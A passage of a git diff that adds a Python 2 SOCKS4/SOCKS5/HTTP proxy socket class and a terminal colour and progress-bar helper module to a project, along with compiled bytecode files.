+ """socksocket([family[, type[, proto]]]) -> socket object
+
+ Open a SOCKS enabled socket. The parameters are the same as
+ those of the standard socket init. In order for SOCKS to work,
+ you must specify family=AF_INET, type=SOCK_STREAM and proto=0.
+ """
+
+ def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):
+ _orgsocket.__init__(self,family,type,proto,_sock)
+ if _defaultproxy != None:
+ self.__proxy = _defaultproxy
+ else:
+ self.__proxy = (None, None, None, None, None, None)
+ self.__proxysockname = None
+ self.__proxypeername = None
+
+ def __recvall(self, bytes):
+ """__recvall(bytes) -> data
+ Receive EXACTLY the number of bytes requested from the socket.
+ Blocks until the required number of bytes have been received.
+ """
+ data = ""
+ while len(data) < bytes:
+ data = data + self.recv(bytes-len(data))
+ return data
+
+ def setproxy(self,proxytype=None,addr=None,port=None,rdns=True,username=None,password=None):
+ """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
+ Sets the proxy to be used.
+ proxytype - The type of the proxy to be used. Three types
+ are supported: PROXY_TYPE_SOCKS4 (including socks4a),
+ PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP
+ addr - The address of the server (IP or DNS).
+ port - The port of the server. Defaults to 1080 for SOCKS
+ servers and 8080 for HTTP proxy servers.
+ rdns - Should DNS queries be preformed on the remote side
+ (rather than the local side). The default is True.
+ Note: This has no effect with SOCKS4 servers.
+ username - Username to authenticate with to the server.
+ The default is no authentication.
+ password - Password to authenticate with to the server.
+ Only relevant when username is also provided.
+ """
+ self.__proxy = (proxytype,addr,port,rdns,username,password)
+
+ def __negotiatesocks5(self,destaddr,destport):
+ """__negotiatesocks5(self,destaddr,destport)
+ Negotiates a connection through a SOCKS5 server.
+ """
+ # First we'll send the authentication packages we support.
+ if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):
+ # The username/password details were supplied to the
+ # setproxy method so we support the USERNAME/PASSWORD
+ # authentication (in addition to the standard none).
+ self.sendall("\x05\x02\x00\x02")
+ else:
+ # No username/password were entered, therefore we
+ # only support connections with no authentication.
+ self.sendall("\x05\x01\x00")
+ # We'll receive the server's response to determine which
+ # method was selected
+ chosenauth = self.__recvall(2)
+ if chosenauth[0] != "\x05":
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ # Check the chosen authentication method
+ if chosenauth[1] == "\x00":
+ # No authentication is required
+ pass
+ elif chosenauth[1] == "\x02":
+ # Okay, we need to perform a basic username/password
+ # authentication.
+ self.sendall("\x01" + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.proxy[5])) + self.__proxy[5])
+ authstat = self.__recvall(2)
+ if authstat[0] != "\x01":
+ # Bad response
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ if authstat[1] != "\x00":
+ # Authentication failed
+ self.close()
+ raise Socks5AuthError,((3,_socks5autherrors[3]))
+ # Authentication succeeded
+ else:
+ # Reaching here is always bad
+ self.close()
+ if chosenauth[1] == "\xFF":
+ raise Socks5AuthError((2,_socks5autherrors[2]))
+ else:
+ raise GeneralProxyError((1,_generalerrors[1]))
+ # Now we can request the actual connection
+ req = "\x05\x01\x00"
+ # If the given destination address is an IP address, we'll
+ # use the IPv4 address request even if remote resolving was specified.
+ try:
+ ipaddr = socket.inet_aton(destaddr)
+ req = req + "\x01" + ipaddr
+ except socket.error:
+ # Well it's not an IP number, so it's probably a DNS name.
+ if self.__proxy[3]==True:
+ # Resolve remotely
+ ipaddr = None
+ req = req + "\x03" + chr(len(destaddr)) + destaddr
+ else:
+ # Resolve locally
+ ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
+ req = req + "\x01" + ipaddr
+ req = req + struct.pack(">H",destport)
+ self.sendall(req)
+ # Get the response
+ resp = self.__recvall(4)
+ if resp[0] != "\x05":
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ elif resp[1] != "\x00":
+ # Connection failed
+ self.close()
+ if ord(resp[1])<=8:
+ raise Socks5Error(ord(resp[1]),_generalerrors[ord(resp[1])])
+ else:
+ raise Socks5Error(9,_generalerrors[9])
+ # Get the bound address/port
+ elif resp[3] == "\x01":
+ boundaddr = self.__recvall(4)
+ elif resp[3] == "\x03":
+ resp = resp + self.recv(1)
+ boundaddr = self.__recvall(resp[4])
+ else:
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ boundport = struct.unpack(">H",self.__recvall(2))[0]
+ self.__proxysockname = (boundaddr,boundport)
+ if ipaddr != None:
+ self.__proxypeername = (socket.inet_ntoa(ipaddr),destport)
+ else:
+ self.__proxypeername = (destaddr,destport)
+
+ def getproxysockname(self):
+ """getsockname() -> address info
+ Returns the bound IP address and port number at the proxy.
+ """
+ return self.__proxysockname
+
+ def getproxypeername(self):
+ """getproxypeername() -> address info
+ Returns the IP and port number of the proxy.
+ """
+ return _orgsocket.getpeername(self)
+
+ def getpeername(self):
+ """getpeername() -> address info
+ Returns the IP address and port number of the destination
+ machine (note: getproxypeername returns the proxy)
+ """
+ return self.__proxypeername
+
+ def __negotiatesocks4(self,destaddr,destport):
+ """__negotiatesocks4(self,destaddr,destport)
+ Negotiates a connection through a SOCKS4 server.
+ """
+ # Check if the destination address provided is an IP address
+ rmtrslv = False
+ try:
+ ipaddr = socket.inet_aton(destaddr)
+ except socket.error:
+ # It's a DNS name. Check where it should be resolved.
+ if self.__proxy[3]==True:
+ ipaddr = "\x00\x00\x00\x01"
+ rmtrslv = True
+ else:
+ ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
+ # Construct the request packet
+ req = "\x04\x01" + struct.pack(">H",destport) + ipaddr
+ # The username parameter is considered userid for SOCKS4
+ if self.__proxy[4] != None:
+ req = req + self.__proxy[4]
+ req = req + "\x00"
+ # DNS name if remote resolving is required
+ # NOTE: This is actually an extension to the SOCKS4 protocol
+ # called SOCKS4A and may not be supported in all cases.
+ if rmtrslv==True:
+ req = req + destaddr + "\x00"
+ self.sendall(req)
+ # Get the response from the server
+ resp = self.__recvall(8)
+ if resp[0] != "\x00":
+ # Bad data
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ if resp[1] != "\x5A":
+ # Server returned an error
+ self.close()
+ if ord(resp[1]) in (91,92,93):
+ self.close()
+ raise Socks4Error((ord(resp[1]),_socks4errors[ord(resp[1])-90]))
+ else:
+ raise Socks4Error((94,_socks4errors[4]))
+ # Get the bound address/port
+ self.__proxysockname = (socket.inet_ntoa(resp[4:]),struct.unpack(">H",resp[2:4])[0])
+ if rmtrslv != None:
+ self.__proxypeername = (socket.inet_ntoa(ipaddr),destport)
+ else:
+ self.__proxypeername = (destaddr,destport)
+
+ def __negotiatehttp(self,destaddr,destport):
+ """__negotiatehttp(self,destaddr,destport)
+ Negotiates a connection through an HTTP server.
+ """
+ # If we need to resolve locally, we do this now
+ if self.__proxy[3] == False:
+ addr = socket.gethostbyname(destaddr)
+ else:
+ addr = destaddr
+ self.sendall("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n")
+ # We read the response until we get the string "\r\n\r\n"
+ resp = self.recv(1)
+ while resp.find("\r\n\r\n")==-1:
+ resp = resp + self.recv(1)
+ # We just need the first line to check if the connection
+ # was successful
+ statusline = resp.splitlines()[0].split(" ",2)
+ if statusline[0] not in ("HTTP/1.0","HTTP/1.1"):
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ try:
+ statuscode = int(statusline[1])
+ except ValueError:
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ if statuscode != 200:
+ self.close()
+ raise HTTPError((statuscode,statusline[2]))
+ self.__proxysockname = ("0.0.0.0",0)
+ self.__proxypeername = (addr,destport)
+
+ def connect(self,destpair):
+ """connect(self,despair)
+ Connects to the specified destination through a proxy.
+ destpar - A tuple of the IP/DNS address and the port number.
+ (identical to socket's connect).
+ To select the proxy server use setproxy().
+ """
+ # Do a minimal input check first
+ if (type(destpair) in (list,tuple)==False) or (len(destpair)<2) or (type(destpair[0])!=str) or (type(destpair[1])!=int):
+ raise GeneralProxyError((5,_generalerrors[5]))
+ if self.__proxy[0] == PROXY_TYPE_SOCKS5:
+ if self.__proxy[2] != None:
+ portnum = self.__proxy[2]
+ else:
+ portnum = 1080
+ _orgsocket.connect(self,(self.__proxy[1],portnum))
+ self.__negotiatesocks5(destpair[0],destpair[1])
+ elif self.__proxy[0] == PROXY_TYPE_SOCKS4:
+ if self.__proxy[2] != None:
+ portnum = self.__proxy[2]
+ else:
+ portnum = 1080
+ _orgsocket.connect(self,(self.__proxy[1],portnum))
+ self.__negotiatesocks4(destpair[0],destpair[1])
+ elif self.__proxy[0] == PROXY_TYPE_HTTP:
+ if self.__proxy[2] != None:
+ portnum = self.__proxy[2]
+ else:
+ portnum = 8080
+ _orgsocket.connect(self,(self.__proxy[1],portnum))
+ self.__negotiatehttp(destpair[0],destpair[1])
+ elif self.__proxy[0] == None:
+ _orgsocket.connect(self,(destpair[0],destpair[1]))
+ else:
+ raise GeneralProxyError((4,_generalerrors[4]))
diff --git a/src/socks.pyc b/src/socks.pyc
new file mode 100644
index 0000000..e68615f
--- /dev/null
+++ b/src/socks.pyc
Binary files differ
diff --git a/src/terminal.py b/src/terminal.py
new file mode 100644
index 0000000..2c43750
--- /dev/null
+++ b/src/terminal.py
@@ -0,0 +1,185 @@
+import sys, re
+
+class TerminalController:
+ """
+ A class that can be used to portably generate formatted output to
+ a terminal.
+
+ `TerminalController` defines a set of instance variables whose
+ values are initialized to the control sequence necessary to
+ perform a given action. These can be simply included in normal
+ output to the terminal:
+
+ >>> term = TerminalController()
+ >>> print 'This is '+term.GREEN+'green'+term.NORMAL
+
+ Alternatively, the `render()` method can used, which replaces
+ '${action}' with the string required to perform 'action':
+
+ >>> term = TerminalController()
+ >>> print term.render('This is ${GREEN}green${NORMAL}')
+
+ If the terminal doesn't support a given action, then the value of
+ the corresponding instance variable will be set to ''. As a
+ result, the above code will still work on terminals that do not
+ support color, except that their output will not be colored.
+ Also, this means that you can test whether the terminal supports a
+ given action by simply testing the truth value of the
+ corresponding instance variable:
+
+ >>> term = TerminalController()
+ >>> if term.CLEAR_SCREEN:
+ ... print 'This terminal supports clearning the screen.'
+
+ Finally, if the width and height of the terminal are known, then
+ they will be stored in the `COLS` and `LINES` attributes.
+ """
+ # Cursor movement:
+ BOL = '' #: Move the cursor to the beginning of the line
+ UP = '' #: Move the cursor up one line
+ DOWN = '' #: Move the cursor down one line
+ LEFT = '' #: Move the cursor left one char
+ RIGHT = '' #: Move the cursor right one char
+
+ # Deletion:
+ CLEAR_SCREEN = '' #: Clear the screen and move to home position
+ CLEAR_EOL = '' #: Clear to the end of the line.
+ CLEAR_BOL = '' #: Clear to the beginning of the line.
+ CLEAR_EOS = '' #: Clear to the end of the screen
+
+ # Output modes:
+ BOLD = '' #: Turn on bold mode
+ BLINK = '' #: Turn on blink mode
+ DIM = '' #: Turn on half-bright mode
+ REVERSE = '' #: Turn on reverse-video mode
+ NORMAL = '' #: Turn off all modes
+
+ # Cursor display:
+ HIDE_CURSOR = '' #: Make the cursor invisible
+ SHOW_CURSOR = '' #: Make the cursor visible
+
+ # Terminal size:
+ COLS = None #: Width of the terminal (None for unknown)
+ LINES = None #: Height of the terminal (None for unknown)
+
+ # Foreground colors:
+ BLACK = BLUE = GREEN = CYAN = RED = MAGENTA = YELLOW = WHITE = ''
+
+ # Background colors:
+ BG_BLACK = BG_BLUE = BG_GREEN = BG_CYAN = ''
+ BG_RED = BG_MAGENTA = BG_YELLOW = BG_WHITE = ''
+
+ _STRING_CAPABILITIES = """
+ BOL=cr UP=cuu1 DOWN=cud1 LEFT=cub1 RIGHT=cuf1
+ CLEAR_SCREEN=clear CLEAR_EOL=el CLEAR_BOL=el1 CLEAR_EOS=ed BOLD=bold
+ BLINK=blink DIM=dim REVERSE=rev UNDERLINE=smul NORMAL=sgr0
+ HIDE_CURSOR=cinvis SHOW_CURSOR=cnorm""".split()
+ _COLORS = """BLACK BLUE GREEN CYAN RED MAGENTA YELLOW WHITE""".split()
+
+ def __init__(self, term_stream=sys.stdout):
+ """
+ Create a `TerminalController` and initialize its attributes
+ with appropriate values for the current terminal.
+ `term_stream` is the stream that will be used for terminal
+ output; if this stream is not a tty, then the terminal is
+ assumed to be a dumb terminal (i.e., have no capabilities).
+ """
+ # Curses isn't available on all platforms
+ try: import curses
+ except: return
+
+ # If the stream isn't a tty, then assume it has no capabilities.
+ if not term_stream.isatty(): return
+
+ # Check the terminal type. If we fail, then assume that the
+ # terminal has no capabilities.
+ try: curses.setupterm()
+ except: return
+
+ # Look up numeric capabilities.
+ self.COLS = curses.tigetnum('cols')
+ self.LINES = curses.tigetnum('lines')
+
+ # Look up string capabilities.
+ for capability in self._STRING_CAPABILITIES:
+ (attrib, cap_name) = capability.split('=')
+ setattr(self, attrib, self._tigetstr(cap_name) or '')
+
+ # Colors
+ set_fg = self._tigetstr('setf')
+ if set_fg:
+ for i,color in zip(range(len(self._COLORS)), self._COLORS):
+ setattr(self, color, curses.tparm(set_fg, i) or '')
+ set_bg = self._tigetstr('setb')
+ if set_bg:
+ for i,color in zip(range(len(self._COLORS)), self._COLORS):
+ setattr(self, 'BG_'+color, curses.tparm(set_bg, i) or '')
+
+ def _tigetstr(self, cap_name):
+ # String capabilities can include "delays" of the form "$<2>".
+ # For any modern terminal, we should be able to just ignore
+ # these, so strip them out.
+ import curses
+ cap = curses.tigetstr(cap_name) or ''
+ return re.sub(r'\$<\d+>[/*]?', '', cap)
+
+ def render(self, template):
+ """
+ Replace each $-substitutions in the given template string with
+ the corresponding terminal control string (if it's defined) or
+ '' (if it's not).
+ """
+ return re.sub(r'\$\$|\${\w+}', self._render_sub, template)
+
+ def _render_sub(self, match):
+ s = match.group()
+ if s == '$$': return s
+ else: return getattr(self, s[2:-1])
+
+#######################################################################
+# Example use case: progress bar
+#######################################################################
+
+class ProgressBar:
+ """
+ A 3-line progress bar, which looks like::
+
+ Header
+ 20% [===========----------------------------------]
+ progress message
+
+ The progress bar is colored, if the terminal supports color
+ output; and adjusts to the width of the terminal.
+ """
+ BAR = '%3d%% ${GREEN}[${BOLD}%s%s${NORMAL}${GREEN}]${NORMAL}\n'
+ HEADER = '${BOLD}${CYAN}%s${NORMAL}\n\n'
+
+ def __init__(self, term, header):
+ self.term = term
+ if not (self.term.CLEAR_EOL and self.term.UP and self.term.BOL):
+ raise ValueError("Terminal isn't capable enough -- you "
+ "should use a simpler progress dispaly.")
+ self.width = self.term.COLS or 75
+ self.bar = term.render(self.BAR)
+ self.header = self.term.render(self.HEADER % header.center(self.width))
+ self.cleared = 1 #: true if we haven't drawn the bar yet.
+ self.update(0, '')
+
+ def update(self, percent, message):
+ if self.cleared:
+ sys.stdout.write(self.header)
+ self.cleared = 0
+ n = int((self.width-10)*percent)
+ sys.stdout.write(
+ self.term.BOL + self.term.UP + self.term.CLEAR_EOL +
+ (self.bar % (100*percent, '='*n, '-'*(self.width-10-n))) +
+ self.term.CLEAR_EOL + message.center(self.width))
+
+ def clear(self):
+ if not self.cleared:
+ sys.stdout.write(self.term.BOL + self.term.CLEAR_EOL +
+ self.term.UP + self.term.CLEAR_EOL +
+ self.term.UP + self.term.CLEAR_EOL)
+ self.cleared = 1
+
+
diff --git a/src/terminal.pyc b/src/terminal.pyc
new file mode 100644
index 0000000..fe4c802
--- /dev/null
+++ b/src/terminal.pyc
Binary files differ